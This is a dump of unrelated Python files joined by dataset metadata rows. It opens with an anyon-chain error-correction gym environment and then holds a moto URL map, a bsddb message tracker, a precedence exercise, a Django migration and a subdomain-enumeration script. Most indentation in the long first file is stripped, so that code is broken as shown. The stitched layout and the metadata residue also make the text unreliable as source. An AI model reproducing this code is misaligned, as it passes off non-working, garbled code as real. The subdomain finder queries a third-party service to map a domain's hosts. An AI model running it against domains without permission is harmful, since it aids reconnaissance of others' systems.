self.state = np.zeros(self.SystemLength)
self.error_state = np.zeros(self.SystemLength)
# Angle limit set to 2 * theta_threshold_radians so failing observation is still within bounds
low = np.zeros(self.SystemLength)
high = np.ones(self.SystemLength)
# Can perform a swap between any pair of sites. Convention is that 0 swaps from 0 to 1 and (SystemLength-1) swaps from (SystemLength-1) to 0.
# i.e., periodic boundary conditions.
self.action_space = spaces.Discrete(self.SystemLength)
self.observation_space = spaces.Box(low, high)
self._seed()
self.reset()
self.viewer = None
anyons_list = self.state
self.steps_beyond_done = 0.
#Need to calculate when the first bath interaction will occur
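        #Gillespie-style sampling: the waiting time to the next bath event is
        #exponential with total rate Norm, i.e. dt = -ln(u)/Norm for u ~ Uniform(0,1).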
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(anyons_list)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate + len(ExPairLocList)*self.AnnihilationRate + \
(len(EmptyPairLocList))*self.CreationRate
self.PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate/Norm
self.PAnn = len(ExPairLocList)*self.AnnihilationRate/Norm
        self.PCre = len(EmptyPairLocList)*self.CreationRate/Norm
self.NextActionProbability = random.random()
self.NextActionTime = self.TotalTime + (-1./Norm)*np.log(self.NextActionProbability)
# Just need to initialize the relevant attributes
self._configure()
def _configure(self, display=None):
self.display = display
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _step(self, action):
assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action))
print "Current time: " + str(self.TotalTime)
print "Next action: " + str(self.NextActionTime)
state = self.state
anyons_list = state
#Store the winding operator before we do anything to the chain
p = int(floor(len(self.state)/2.))
pl,pr = self.state[p],self.state[p+1]
#I'm going to change this into a more discrete picture--where there's an integer system clock,
        #and dynamics occur in between clock calls.
#The most obvious way to do this is to stick a while loop in the if statement below that performs dynamics until
#the next action time is after the next cycle of (CorrectionPeriod) * (n + 1) (if this were occuring between n and n+1)
#if the next corrective action would occur after the next bath interaction, do the bath interaction and calculate the next bath interaction time
if self.TotalTime + (1. / self.CorrectionRate) > self.NextActionTime:
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(self.state)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate + len(ExPairLocList)*self.AnnihilationRate + \
(len(EmptyPairLocList))*self.CreationRate
self.PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate/Norm
self.PAnn = len(ExPairLocList)*self.AnnihilationRate/Norm
            self.PCre = len(EmptyPairLocList)*self.CreationRate/Norm
print RightHoppableLocList
print LeftHoppableLocList
print "**"
r = self.NextActionProbability
#print PHop, PAnn, PCre
#print r
#Hopping
if r < self.PHop:
HopSite = choice(RightHoppableLocList + LeftHoppableLocList)
self.state[HopSite] = 0
if HopSite in RightHoppableLocList:
self.state[(HopSite+1)%len(self.state)] = 1
else:
self.state[(HopSite+1)%len(self.state)] = 0
self.state[(HopSite)] = 1
self.error_state[HopSite] = (self.error_state[HopSite] + 1) % 2
#print "Hopping!"
#print chain
#Annihilating
if (r >= self.PHop and r < self.PHop + self.PAnn):
AnnihilateSite = choice(ExPairLocList)
self.state[AnnihilateSite] = 0
self.state[(AnnihilateSite+1)%len(self.state)] = 0
self.error_state[AnnihilateSite] = (self.error_state[AnnihilateSite] + 1) % 2
#print "Annihilating!"
#print chain
#Creating
if (r >= self.PHop + self.PAnn):
CreateSite = choice(EmptyPairLocList)
self.state[CreateSite] = 1
self.state[(CreateSite+1)%len(self.state)] = 1
self.error_state[CreateSite] = (self.error_state[CreateSite] + 1) % 2
#print "Creating!"
#print chain
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(anyons_list)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate + len(ExPairLocList)*self.AnnihilationRate + \
(len(EmptyPairLocList))*self.CreationRate
self.PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate/Norm
self.PAnn = len(ExPairLocList)*self.AnnihilationRate/Norm
            self.PCre = len(EmptyPairLocList)*self.CreationRate/Norm
#Update the system time, next action time, and next action probability
self.TotalTime = self.NextActionTime
print "Action too late!" + str(self.TotalTime)
self.NextActionProbability = random.random()
self.NextActionTime = self.TotalTime + (-1./Norm)*np.log(self.NextActionProbability)
else:
#If we haven't exceeded the bath interaction timescale, we have to apply some swaps!
anyons_list, CycleTime, NewRates, NoHops, Proceed, self.Sector = self.CorrectionProtocol(anyons_list, self.TotalTime, self.TotalTime+(1./self.CorrectionRate), self.CorrectionRate, \
self.PHop, self.PAnn, self.PCre, [action], self.Sector)
#self.TotalTime+=CycleTime
self.TotalTime+=1.
print self.TotalTime
if NewRates == True:
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(anyons_list)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate + len(ExPairLocList)*self.AnnihilationRate + \
(len(EmptyPairLocList))*self.CreationRate
self.PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate/Norm
self.PAnn = len(ExPairLocList)*self.AnnihilationRate/Norm
                self.PCre = len(EmptyPairLocList)*self.CreationRate/Norm
self.NextActionProbability = random.random()
self.NextActionTime = self.TotalTime + (-1./Norm)*np.log(self.NextActionProbability)
self.state = anyons_list
#Update the sector
self.Sector = (self.Sector + self.CheckSector(self.state,p,pl,pr))%2
done = self.TotalTime > 1000. \
or self.CheckState(self.state, self.Sector) == 1
done = bool(done)
if not done:
reward = 1.0
elif self.steps_beyond_done is None:
# Pole just fell!
self.steps_beyond_done = 0
reward = 1.0
else:
if self.steps_beyond_done == 0:
logger.warn("You are calling 'step()' even though this environment has already returned done = True. You should always call 'reset()' once you receive 'done = True' -- any further steps are undefined behavior.")
self.steps_beyond_done += 1
reward = 0.0
return np.array(self.state), reward, done, {}
def _reset(self):
self.state = np.zeros(self.SystemLength)
self.error_state = np.zeros(self.SystemLength)
self.TotalTime = 0.
self.state[0] = 1.
self.state[22] = 1.
self.error_state[22]=1
self.error_state[23]=1
self.steps_beyond_done = None
return np.array(self.state)
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
screen_width = 600
screen_height = 400
#world_width = self.x_threshold*2
#scale = screen_width/world_width
#carty = 100 # TOP OF CART
polewidth = 10.0
#polelen = scale * 1.0
#cartwidth = 50.0
#cartheight = 30.0
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.Viewer(screen_width, screen_height)#, display=self.display)
'''l,r,t,b = -cartwidth/2, cartwidth/2, cartheight/2, -cartheight/2
axleoffset =cartheight/4.0
cart = rendering.FilledPolygon([(l,b), (l,t), (r,t), (r,b)])
self.carttrans = rendering.Transform()
cart.add_attr(self.carttrans)
self.viewer.add_geom(cart)
l,r,t,b = -polewidth/2,polewidth/2,polelen-polewidth/2,-polewidth/2
pole = rendering.FilledPolygon([(l,b), (l,t), (r,t), (r,b)])
pole.set_color(.8,.6,.4)
self.poletrans = rendering.Transform(translation=(0, axleoffset))
pole.add_attr(self.poletrans)
pole.add_attr(self.carttrans)
self.viewer.add_geom(pole)'''
for i in xrange(self.SystemLength):
self.offsettrans = rendering.Transform()
self.error_offsettrans = rendering.Transform()
self.translist.append(self.offsettrans)
self.error_translist.append(self.error_offsettrans)
axle = rendering.make_circle(polewidth/2)
error = rendering.make_circle(polewidth/4)
axle.add_attr(self.offsettrans)
error.add_attr(self.error_offsettrans)
axle.set_color(.8,.6,.4)
error.set_color(.1,.1,.1)
self.viewer.add_geom(axle)
self.viewer.add_geom(error)
#print "Putting on the screen!"
#self.track = rendering.Line((0,carty), (screen_width,carty))
#self.track.set_color(0,0,0)
#self.viewer.add_geom(self.track)
for i,t in enumerate(self.translist):
#print "something happening?"
if self.state[i]!=0:
#print "Moving to be visible!"
t.set_translation(i*(400./self.SystemLength)+100., 200)
else:
t.set_translation(-10,-10)
for i,t in enumerate(self.error_translist):
if self.error_state[i]!=0:
t.set_translation(i*(400./self.SystemLength)+100. + (400./self.SystemLength)/2., 200)
else:
t.set_translation(-10,-10)
#print "This is being run, though!"
#x = self.state
#cartx = x[0]*scale+screen_width/2.0 # MIDDLE OF CART
#self.carttrans.set_translation(cartx, carty)
#self.poletrans.set_rotation(-x[2])
return self.viewer.render()#return_rgb_array = mode=='rgb_array')
#ISING CODE
#*****************************************************
def ReturnExcitationInformation(self, chain):
ExLocList = []
ExPairLocList = []
EmptyLocList = []
EmptyPairLocList = []
RightHoppableLocList = []
LeftHoppableLocList = []
for i,c in enumerate(chain):
if c == 1:
ExLocList.append(i)
if chain[(i+1)%len(chain)] == 1:
ExPairLocList.append(i)
else:
RightHoppableLocList.append(i)
else:
EmptyLocList.append(i)
if chain[(i+1)%len(chain)] == 0:
EmptyPairLocList.append(i)
else:
LeftHoppableLocList.append((i)%len(chain))
return ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList
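    # Illustrative example: for chain = [1, 1, 0, 0] with periodic boundaries the
    # bonds classify as one excitation pair (0,1), one right-hoppable site (1),
    # one empty pair (2,3) and one left-hoppable bond (3), so this returns
    # ([0, 1], [0], [2, 3], [2], [1], [3]).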
def CalculateProbabilities(self, chain, CreationRate, AnnihilationRate, HoppingRate):
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(chain)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate + len(ExPairLocList)*AnnihilationRate + \
(len(EmptyPairLocList))*CreationRate
PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate/Norm
PAnn = len(ExPairLocList)*AnnihilationRate/Norm
        PCre = len(EmptyPairLocList)*CreationRate/Norm
return PHop, PAnn, PCre
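    # For the [1, 1, 0, 0] example above this gives Norm = 2*HoppingRate +
    # AnnihilationRate + CreationRate, and PHop + PAnn + PCre = 1 once every
    # process is weighted by its own rate.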
    def AdvanceTime(self, chain, StartTime, CreationRate, AnnihilationRate, HoppingRate, CorrectionRate, CorrectionSwaps, sector):
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(chain)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate + len(ExPairLocList)*AnnihilationRate + \
(len(EmptyPairLocList))*CreationRate
PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate/Norm
PAnn = len(ExPairLocList)*AnnihilationRate/Norm
        PCre = len(EmptyPairLocList)*CreationRate/Norm
r = random.random()
DeltaTau = (-1./Norm)*np.log(r)
        chain, CycleTime, NewRates, NoHops, Proceed, sector = self.CorrectionProtocol(chain, StartTime, StartTime+DeltaTau, CorrectionRate, \
            PHop, PAnn, PCre, CorrectionSwaps, sector)
#NewRates = False
#CycleTime = 0
#NoHops = True
p = int(floor(len(chain)/2.))
pl,pr = chain[p],chain[p+1] #previous values of chain
if NewRates == False:
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(chain)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate + len(ExPairLocList)*AnnihilationRate + \
(len(EmptyPairLocList))*CreationRate
PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate/Norm
PAnn = len(ExPairLocList)*AnnihilationRate/Norm
            PCre = len(EmptyPairLocList)*CreationRate/Norm
#print PHop, PAnn, PCre
#print r
#Hopping
if r < PHop:
HopSite = choice(RightHoppableLocList + LeftHoppableLocList)
chain[HopSite] = 0
if HopSite in RightHoppableLocList:
chain[(HopSite+1)%len(chain)] = 1
                else:
                    chain[(HopSite+1)%len(chain)] = 0
                    chain[HopSite] = 1
#print "Hopping!"
#print chain
#Annihilating
if (r >= PHop and r < PHop + PAnn):
AnnihilateSite = choice(ExPairLocList)
chain[AnnihilateSite] = 0
chain[(AnnihilateSite+1)%len(chain)] = 0
#print "Annihilating!"
#print chain
#Creating
if (r >= PHop + PAnn):
CreateSite = choice(EmptyPairLocList)
chain[CreateSite] = 1
chain[(CreateSite+1)%len(chain)] = 1
#print "Creating!"
#print chain
        sector = (sector + self.CheckSector(chain,p,pl,pr))%2
if NoHops or not(Proceed):
return chain, DeltaTau, sector
else:
return chain, CycleTime, sector
def CheckSector(self, chain,p,pl,pr):
increment = 0
if chain[p]!=pl and chain[p+1] != pr:
increment = 1
#print p,pl,pr,"\t",chain[p],chain[p+1],"\t",increment
#print chain
return increment
#Constructs a list with the indices for conditional swaps in the correction protocol
#Convention is that the value at protocol[i] is CSWAPPED with protocol[(i+1)%length]
def SwapProtocol(self, length):
sublength = length/2 - 1
protocol = []
for i in xrange(length):
for j in xrange(sublength):
for k in xrange(sublength - j):
protocol.append((i+(j+k))%length)
for k in xrange(sublength - j):
protocol.append((i+(sublength-k-1))%length)
return protocol
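    # Illustrative example: SwapProtocol(4) has sublength 1, so each site index is
    # simply visited twice in order: [0, 0, 1, 1, 2, 2, 3, 3].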
def SwapProtocol2(self, length):
sublength = int(math.ceil(length/2))
subdomain = int(sublength / 2)
protocol = []
for c in xrange(4):
subprotocol = []
for i in xrange(subdomain-1):
subprotocol.append((subdomain*(c+1) + i)%length)
protocol.append(subprotocol)
for j in xrange(subdomain-1):
for k in xrange(j+1):
protocol.append((subdomain*c + k + (subdomain-1) - (j+1))%length)
protocol.append(subprotocol)
protocol = flatten(protocol)
return protocol
def SwapProtocol3(self, length):
sublength = int(math.ceil(length/2))
subdomain = int(sublength / 2)
protocol = []
for c in xrange(4):
subprotocol = []
for i in xrange(subdomain-1):
for m in xrange(i+1):
subprotocol.append((subdomain*(c+1) + i - m)%length)
protocol.append(subprotocol)
for j in xrange(subdomain-1):
for k in xrange(j+1):
protocol.append((subdomain*c + k + (subdomain-1) - (j+1))%length)
protocol.append(subprotocol)
protocol = flatten(protocol)
return protocol
def SwapProtocol4(self, length):
sublength = int(math.ceil(length/2))
subdomain = int(sublength / 4)
protocol = []
for c in xrange(8):
subprotocol = []
for i in xrange(subdomain-1):
for m in xrange(i+1):
subprotocol.append((subdomain*(c+1) + i - m)%length)
protocol.append(subprotocol)
for j in xrange(subdomain-1):
for k in xrange(j+1):
protocol.append((subdomain*c + k + (subdomain-1) - (j+1))%length)
protocol.append(subprotocol)
protocol = flatten(protocol)
return protocol
def SwapProtocol5(self, length):
sublength = int(math.ceil(length/2))
protocol = []
for j in xrange(sublength):
if j%2==0:
protocol.append(2*j)
protocol.append(2*j+1)
protocol.append(2*j)
protocol.append(2*j+1)
return protocol
def CSwap(self, chain, i):
#print i
if chain[i]!=chain[(i+1)%len(chain)]:
inter = chain[i]
chain[i] = chain[(i+1)%len(chain)]
chain[(i+1)%len(chain)] = inter
self.error_state[i] = (self.error_state[i] + 1) % 2
####print "Swapping at " + str(i) + "!: ",chain
return chain
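    # Illustrative example: CSwap([1, 0, 0, 0], 0) returns [0, 1, 0, 0] and toggles
    # error_state[0], recording that a swap moved an excitation across that bond.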
def CorrectionProtocol(self, chain, oldtime, newtime, CorrectionRate, PHop, PAnn, PCre, CorrectionSwaps, sector):
print "Attempting correction protocol"
#print "What"
CycleTime = 0
#PHop, PAnn, PCre = CalculateProbabilities(chain, CreationRate, AnnihilationRate, HoppingRate)
#print PHop, PAnn, PCre
ProbabilityHasChanged = False
#NoChange = True
NumberOfSwaps = len(CorrectionSwaps)
#Need to calculate where the correction protocol currently is:
CorrectionPeriod = 1./CorrectionRate
NumberCompletedCycles, CurrentCycleTime = divmod(oldtime, CorrectionPeriod)
IndexInCycle = int(floor((CurrentCycleTime / CorrectionPeriod) * NumberOfSwaps))
Proceed = True
'''if (oldtime + CorrectionPeriod/NumberOfSwaps) > newtime:
Proceed = False
#psuccess = (newtime - oldtime) / (CorrectionPeriod/NumberOfSwaps)
#if random.random() < psuccess:
# Proceed = True
'''
        #This loop currently executes at most once per call; it is kept as a loop so the protocol can be generalized later.
print oldtime+CycleTime < newtime
print not(ProbabilityHasChanged)
print not(PHop == 0)
while(oldtime+CycleTime < newtime and not(ProbabilityHasChanged) and not(PHop == 0)):# and Proceed == True):# and not(PAnn > 0)):
####print "Timing information: ", CycleTime,"\t",oldtime,"\t", newtime,"\t",(newtime-oldtime)-CycleTime,"\t",CorrectionPeriod/NumberOfSwaps
#chain = self.CSwap(chain, CorrectionSwaps[IndexInCycle])
chain = self.CSwap(chain, CorrectionSwaps[0])
print "Swapping" + str(CorrectionSwaps[0])
#parallel?
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + NumberOfSwaps/4)%NumberOfSwaps])
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + 2*NumberOfSwaps/4)%NumberOfSwaps])
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + 3*NumberOfSwaps/4)%NumberOfSwaps])
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + 2*NumberOfSwaps/4)%NumberOfSwaps])
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + 3*NumberOfSwaps/4)%NumberOfSwaps])
PHopInter, PAnnInter, PCreInter = self.CalculateProbabilities(chain, self.CreationRate, self.AnnihilationRate, self.HoppingRate)
#print PHopInter, PAnnInter, PCreInter
if (PHop != PHopInter or PAnn != PAnnInter or PCre != PCreInter):
ProbabilityHasChanged = True
IndexInCycle = (IndexInCycle+1)%NumberOfSwaps
CycleTime+=CorrectionPeriod/NumberOfSwaps
NoHops = (PHop == 0)
####print "At end of correction", chain
#print "Starttime: ",oldtime,"Candidate endtime:",newtime,"Cycle endtime:",oldtime+CycleTime
#print "New rate equations: ", ProbabilityHasChanged, "Nohops: ", NoHops, "Proceeded?", Proceed
return chain, CycleTime, ProbabilityHasChanged, NoHops, Proceed, sector
def CheckState(self, chain, sector):
if sum(chain)==0:
return 2*sector-1
else:
return 0
def ProcessTraj(self, traj,avgtraj,maxtime):
#print traj
#avgtraj[0]+=traj[0][1]
trajindex = 0
for i, val in enumerate(avgtraj):
if i < len(traj) and i > 0: #safety first!
while trajindex < len(traj) and traj[trajindex][0] < (1.0*maxtime / len(avgtraj))*i:
#print "Window: ",(1.0*maxtime / len(avgtraj))*i
trajindex+=1
avgtraj[i]+=traj[trajindex-1][1]
return avgtraj
| 34.364952 | 215 | 0.705076 | 2,612 | 21,375 | 5.730475 | 0.158882 | 0.018038 | 0.036478 | 0.063135 | 0.467731 | 0.433391 | 0.39678 | 0.368052 | 0.344335 | 0.325227 | 0 | 0.016463 | 0.167392 | 21,375 | 621 | 216 | 34.42029 | 0.824577 | 0.181988 | 0 | 0.361878 | 0 | 0.002762 | 0.021143 | 0.001397 | 0 | 0 | 0 | 0 | 0.002762 | 0 | null | null | 0 | 0.035912 | null | null | 0.033149 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62383bc8933f1f4eaa948064e8b702400552ae83 | 428 | py | Python | resqs/core/urls.py | UMass-Rescue/moto | 3aa52aca28c622be9708da5fd31a8c8b92801634 | [
"Apache-2.0"
] | null | null | null | resqs/core/urls.py | UMass-Rescue/moto | 3aa52aca28c622be9708da5fd31a8c8b92801634 | [
"Apache-2.0"
] | null | null | null | resqs/core/urls.py | UMass-Rescue/moto | 3aa52aca28c622be9708da5fd31a8c8b92801634 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from .responses import MotoAPIResponse
url_bases = ["https?://motoapi.amazonaws.com"]
response_instance = MotoAPIResponse()
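# moto substitutes each entry of url_bases for "{0}" in the keys below, so e.g.
# the dashboard handler is matched against https?://motoapi.amazonaws.com/resqs-api/$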
url_paths = {
"{0}/resqs-api/$": response_instance.dashboard,
"{0}/resqs-api/data.json": response_instance.model_data,
"{0}/resqs-api/reset": response_instance.reset_response,
"{0}/resqs-api/reset-auth": response_instance.reset_auth_response,
}
| 30.571429 | 70 | 0.752336 | 53 | 428 | 5.773585 | 0.471698 | 0.261438 | 0.117647 | 0.091503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010444 | 0.10514 | 428 | 13 | 71 | 32.923077 | 0.788512 | 0 | 0 | 0 | 0 | 0 | 0.259346 | 0.179907 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6238442b97ca6a6ef8a0ad9749bdaae56317f29d | 1,305 | py | Python | hammer/tracker.py | mizerlou/hammer | 353f176bffff4a6b7726361cdafb986fe2302f19 | [
"Apache-2.0"
] | 1 | 2016-06-06T20:22:13.000Z | 2016-06-06T20:22:13.000Z | hammer/tracker.py | mizerlou/hammer | 353f176bffff4a6b7726361cdafb986fe2302f19 | [
"Apache-2.0"
] | null | null | null | hammer/tracker.py | mizerlou/hammer | 353f176bffff4a6b7726361cdafb986fe2302f19 | [
"Apache-2.0"
] | null | null | null | import anydbm, os.path, time, bsddb, sys
class MessageTracker:
def __init__(self, tracker_file):
flag = (os.path.exists(tracker_file) and "w") or "c"
#self.tracker = anydbm.open(tracker_file, flag)
self.tracker = bsddb.hashopen(tracker_file, flag)
def close(self):
self.tracker.close()
def get_id(self, msg):
return msg["message-id"]
# return (msg["message-id"]
# + "/" + msg.get("x-from-line", msg.get("from", ""))
# + "/" + msg.get("to", ""))
def ham(self, msg):
self._add(msg, "h")
def spam(self, msg):
self._add(msg, "s")
def _add(self, msg, val):
        key = self.get_id(msg)
        try:
            self.tracker[key] = val
        except Exception:
            print >> sys.stderr, "ERROR: '%s' => '%s'" % (key, val)
raise
def get(self, msg, failobj=None):
key = self.get_id(msg)
try:
return self.tracker[key]
except KeyError:
return failobj
def seen(self, msg):
return self.tracker.has_key(self.get_id(msg))
def remove(self, msg):
del self.tracker[self.get_id(msg)]
def dump(self):
for (k,v) in self.tracker.iteritems():
print k, "---", v
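# Illustrative usage sketch (assumes Python 2 with bsddb, and that msg is any
# mapping with a "message-id" key, e.g. an email.message.Message):
#   tracker = MessageTracker("/tmp/tracker.db")
#   tracker.spam(msg)               # remember msg as spam
#   assert tracker.get(msg) == "s"
#   tracker.close()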
| 27.1875 | 68 | 0.514943 | 166 | 1,305 | 3.945783 | 0.349398 | 0.151145 | 0.054962 | 0.073282 | 0.148092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.330268 | 1,305 | 47 | 69 | 27.765957 | 0.749428 | 0.144061 | 0 | 0.121212 | 0 | 0 | 0.032345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.030303 | null | null | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62416172cffe17c94f2ee1ae5b11d654511779a9 | 279 | py | Python | Task1/chapter14.py | shkhaider2015/AI_Lab_Task | 642a0d5e30515dac6972da194741b829cdc63f30 | [
"Unlicense"
] | null | null | null | Task1/chapter14.py | shkhaider2015/AI_Lab_Task | 642a0d5e30515dac6972da194741b829cdc63f30 | [
"Unlicense"
] | null | null | null | Task1/chapter14.py | shkhaider2015/AI_Lab_Task | 642a0d5e30515dac6972da194741b829cdc63f30 | [
"Unlicense"
] | null | null | null | # addition takes place after multiplication and division
num1 = 1 + 4 * 3 / 2;
# same as 5 * 3 /2
num2 = (1 + 4) * 3 / 2;
# same as 1+12/2
num3 = 1 + (4 * 3) / 2;
print("python follow precedence rules");
# under Python 3 division these print 7.0, 7.5 and 7.0 respectively
print(num1);
print(num2);
print(num3); | 18.6 | 61 | 0.620072 | 49 | 279 | 3.530612 | 0.55102 | 0.046243 | 0.052023 | 0.069364 | 0.115607 | 0.115607 | 0 | 0 | 0 | 0 | 0 | 0.125581 | 0.229391 | 279 | 15 | 62 | 18.6 | 0.67907 | 0.419355 | 0 | 0 | 0 | 0 | 0.189873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.571429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
624ded040b53f88852fd60dd292b8fb6fb23b421 | 1,164 | py | Python | django_watermark_images/items/migrations/0001_initial.py | abarto/django-watermark-images | 5f01c8f0da7359c4d96650029d5beb70938fbe47 | [
"MIT"
] | 11 | 2016-12-05T01:12:46.000Z | 2021-05-05T21:41:14.000Z | django_watermark_images/items/migrations/0001_initial.py | abarto/django-watermark-images | 5f01c8f0da7359c4d96650029d5beb70938fbe47 | [
"MIT"
] | 1 | 2020-11-30T13:26:06.000Z | 2020-12-05T11:44:59.000Z | django_watermark_images/items/migrations/0001_initial.py | abarto/django-watermark-images | 5f01c8f0da7359c4d96650029d5beb70938fbe47 | [
"MIT"
] | 3 | 2017-02-07T03:36:42.000Z | 2020-08-10T00:16:04.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-10 16:15
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import items.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='title')),
('description', models.TextField(blank=True, null=True, verbose_name='description')),
('image', models.ImageField(upload_to=items.models.image_upload_to, verbose_name='original image')),
],
options={
'abstract': False,
},
),
]
| 35.272727 | 124 | 0.630584 | 121 | 1,164 | 5.876033 | 0.520661 | 0.092827 | 0.075949 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021591 | 0.243986 | 1,164 | 32 | 125 | 36.375 | 0.786364 | 0.056701 | 0 | 0 | 1 | 0 | 0.088584 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62588608a3f5e4881c91b92770889c28b45edea4 | 587 | py | Python | subdomain.py | ouldevloper/subDomainFinder | 3b888e8267d8b89401a468d2622edd6716a88293 | [
"MIT"
] | null | null | null | subdomain.py | ouldevloper/subDomainFinder | 3b888e8267d8b89401a468d2622edd6716a88293 | [
"MIT"
] | null | null | null | subdomain.py | ouldevloper/subDomainFinder | 3b888e8267d8b89401a468d2622edd6716a88293 | [
"MIT"
] | null | null | null | import requests
import re
url=input("Enter Url [ex: example.com]: ")
def getSubDomain(url):
url=url.replace("www.","").replace("https://","").replace("http://","")
pattern = "[\w]{1,256}\.[a-zA-Z0-9()]{1,6}"
_l = re.compile(pattern)
if _l.match(url):
response = requests.get(f"https://sonar.omnisint.io/subdomains/{url}").text
urls = response.split("\n")
for u in set(urls):
if u=="" or len(u)<=3:
                continue
print("[+] ",u.replace("\"","").replace("'","").replace(",","").replace(" ",""))
getSubDomain(url) | 34.529412 | 95 | 0.524702 | 75 | 587 | 4.08 | 0.64 | 0.137255 | 0.137255 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019438 | 0.211244 | 587 | 17 | 96 | 34.529412 | 0.641469 | 0 | 0 | 0 | 0 | 0 | 0.27551 | 0.052721 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0.066667 | 0.133333 | 0 | 0.2 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |